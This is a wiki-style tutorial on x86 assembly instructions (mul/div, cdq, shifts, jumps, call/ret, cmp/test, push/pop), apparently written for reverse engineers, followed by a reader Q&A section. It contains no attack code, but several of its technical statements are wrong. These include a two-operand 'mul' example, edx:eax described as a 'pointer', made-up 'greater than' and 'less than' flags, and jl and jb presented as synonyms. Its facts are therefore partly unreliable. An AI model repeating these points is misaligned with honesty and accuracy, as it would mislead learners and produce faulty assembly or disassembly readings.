''mul'' multiplies the unsigned value in eax with the operand, and stores the result in the 64-bit pointer edx:eax. ''imul'' does the same thing, except the value is signed. Here are some examples of mul:<br />
mul ecx ; edx:eax = eax * ecx (unsigned)<br />
imul edx ; edx:eax = eax * edx (signed)<br />
<br />
When used with two parameters, ''mul'' instead multiplies the first by the second as expected:<br />
mul ecx, 10h ; ecx = ecx * 0x10 (unsigned)<br />
imul ecx, 20h ; ecx = ecx * 0x20 (signed)<br />
<br />
''div'' divides the 64-bit value in edx:eax by the operand, and stores the quotient in eax. The remainder (modulus) is stored in edx. In other words, div does both division and modular division, at the same time. Typically, a program will only use one or the other, so you will have to check which instructions follow to see whether eax or edx is saved. Here are some examples:<br />
div ecx ; eax = edx:eax / ecx (unsigned)<br />
; edx = edx:eax % ecx (unsigned)<br />
<br />
idiv ecx ; eax = edx:eax / ecx (signed)<br />
; edx = edx:eax % ecx (signed)<br />
<br />
''cdq'' is generally used immediately before idiv. It stands for "convert double to quad." In other words, convert the 32-bit value in eax to the 64-bit value in edx:eax, overwriting anything in edx with either 0's (if eax is positive) or F's (if eax is negative). This is very similar to movsx, above. <br />
<br />
''xor edx, edx'' is generally used immediately before div. It clears edx to ensure that no leftover data is divided. <br />
<br />
Here is a common use of cdq and idiv:<br />
mov eax, 1007 ; 1007 will be divided<br />
mov ecx, 10 ; .. by 10<br />
cdq ; extends eax into edx<br />
idiv ecx ; eax will be 1007/10 = 100, and edx will be 1007%10 = 7<br />
<br />
Here is a common use of xor and div (the results are the same as the previous example):<br />
mov eax, 1007<br />
mov ecx, 10<br />
xor edx, edx<br />
div ecx<br />
<br />
== shl, shr, sal, sar ==<br />
shl - shift left, shr - shift right.<br />
<br />
sal - shift arithmetic left, sar - shift arithmetic right.<br />
<br />
<br />
These are used to do a binary shift, equivalent to the C operations << and >>.<br />
<br />
They each take two operations: the register to use, and the number of places to shift the value in the regoster. As computers operate in base 2, these commands can be used as a faster replacement for multiplication/division operations involving powers of 2.<br />
<br />
Divide by 2 (unsigned):<br />
mov eax, 16 ; eax = 16<br />
shr eax, 1 ; eax = 8<br />
<br />
Multiply by 4 (signed):<br />
mov eax, 5 ; eax = 5<br />
sal eax, 2 ; eax = 20<br />
<br />
Visualising the bits moving:<br />
mov eax, 7 ; = 0000 0111 (7)<br />
shl eax, 1 ; = 0000 1110 (14)<br />
shl eax, 2 ; = 0011 1000 (56)<br />
shr eax, 1 ; = 0001 1100 (28)<br />
<br />
== Jumping Around ==<br />
Instructions in this section are used to compare values and to make jumps. These jumps are used for calls, if statements, and every type of loop. The operand for most jump instructions is the address to jump to. <br />
<br />
=== jmp ===<br />
''jmp'', or jump, sends the program execution to the specified address no matter what. Here is an example:<br />
jmp 1400h ; jump to the address 0x1400<br />
<br />
=== call, ret ===<br />
''call'' is similar to jump, except that in addition to sending the program to the specified address, it also saves ("pushes") the address of the executable instruction onto the stack. This will be explained more in a later section. <br />
<br />
''ret'' removes ("pops") the first value off of the stack, and jumps to it. In almost all cases, this value was placed onto the stack by the call instruction. If the stack pointer is at the wrong location, or the saved address was overwritten, ret attempts to jump to an invalid address which usually crashes the program. In some cases, it may jump to the wrong place where the program will almost inevitably crash. <br />
<br />
''ret'' can also have a parameter. This parameter is added to the stack immediately after ret executes its jump. This addition allows the function to remove values that were pushed onto the stack. This will be discussed in a later section. <br />
<br />
The combination of ''call'' and ''ret'' are used to implement functions. Here is an example of a simple function:<br />
<br />
<pre> call 4000h<br />
...... ; any amount of code<br />
4000h:<br />
mov eax, 1<br />
ret ; Because eax represents the return value, this function would return 1, and <br />
nothing else would happen<br />
</pre><br />
<br />
=== cmp, test ===<br />
''cmp'', or compare, compares the two operands and sets a number of flags in a special-purpose register based on the result. Specialized jump commands can check these flags to jump on certain conditions. One way of remembering how ''cmp'' works is to think of it as subtracting the second parameter from the first, comparing the result to 0, and throwing away the result. <br />
<br />
''test'' is very similar to ''cmp'', except that it performs a bitwise 'and' operation between the two variables (and throws away the result), and compares it to zero. ''test'' is most commonly used to compare a variable to itself to check if it's zero. <br />
<br />
Here are the most common flags:<br />
* Zero -- set if and only if the two elements are equal (ie, if the resultant operation was equal to zero)<br />
* Greater than -- set if the first element is greater than the second (ie, if the resultant operation was greater than zero)<br />
* Less than -- set if the first element is less than the second (ie, if the resultant operation was less than zero)<br />
<br />
Flags are set by most arithmetic commands. The most commonly used commands used for comparisons are cmp, inc, and dec.<br />
<br />
=== jz/je, jnz/jne, jl/jb, jg, jle, jge ===<br />
* ''jz'' and ''je'' (which are synonyms) will jump to the address specified if and only if the 'zero' flag is set, which indicates that the two values were equal. In other words, "jump if equal". <br />
* ''jnz'' and ''jne'' (which are also synonyms) will jump to the address specified if and only if the 'zero' flag is not set, which indicates that the two values were not equal. In other words, "jump if different". <br />
* ''jl'' and ''jb'' (which are synonyms) jumps if the first parameter is less than the second. <br />
* ''jg'' jumps if the first parameter is greater than the second. <br />
* ''jle'' jumps if the 'less than' or the 'zero' flag is set, so "less than or equal to". <br />
* ''jge'' jumps if the first is "greater than or equal to" the second.<br />
<br />
These jumps are all used to implement various loops and conditions. For example, here is some C code:<br />
if(a == 3)<br />
b;<br />
else<br />
c;<br />
And here is how it might look in assembly (not exactly assembly, but this is an example):<br />
10 cmp a, 3<br />
20 jne 50<br />
30 b<br />
40 jmp 60<br />
50 c<br />
60<br />
<br />
Here is an example of a loop in C:<br />
for(i = 0; i < 5; i++)<br />
{<br />
a;<br />
b;<br />
}<br />
And here is the equivalent loop in assembly:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 inc ecx<br />
50 cmp ecx, 5<br />
60 jl 20<br />
<br />
== Manipulating the Stack ==<br />
Functions in this section are used for adding and removing data from the stack. The stack will be examined in detail in a later section; this section will simply show some commonly used commands. <br />
<br />
=== push, pop ===<br />
''push'' decrements the stack pointer by the size of the operand, then saves the operand to the new address. This line:<br />
push ecx<br />
Is functionally equivalent to:<br />
sub esp, 4<br />
mov [esp], ecx<br />
<br />
''pop'' sets the operand to the value on the stack, then increments the stack pointer by the size of the operand. This assembly:<br />
pop ecx<br />
Is functionally equivalent to:<br />
mov ecx, [esp]<br />
add esp, 4<br />
<br />
This will be examined in detail in the Stack section of this tutorial.<br />
<br />
=== pushaw, pushad, popaw, popad ===<br />
''pushaw'' and ''pushad'' save all 16-bit or 32-bit registers (respectively) onto the stack. <br />
<br />
''popaw'' and ''popad'' restore all 16-bit or 32-bit registers from the stack. <br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, and I will do my best to answer them; however, you may need to contact me to let me know that a question exists.<br />
<br />
Further explain bitwise<br />
<br />
In your example code:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 cmp ecx, 5<br />
50 jl 20<br />
Wont this just loop forever because ecx is never incremented? Total noob here so i may have missed something obvious.<br />
*** Yes, my mistake. <br />
<br />
Indeed, would not this be more accurate?:<br />
10 mov ecx, 0<br />
20 a<br />
30 b<br />
40 inc ecx<br />
50 comp ecx, 5<br />
60 jl 20<br />
*** Changed. <br />
<br />
Also, The stack is decremented when pushed, but increased when poped? Isn't this counterintuitive?<br />
*** Yes, the stack starts high and grows downwards. Welcome to x86 assembler!</div>Killboy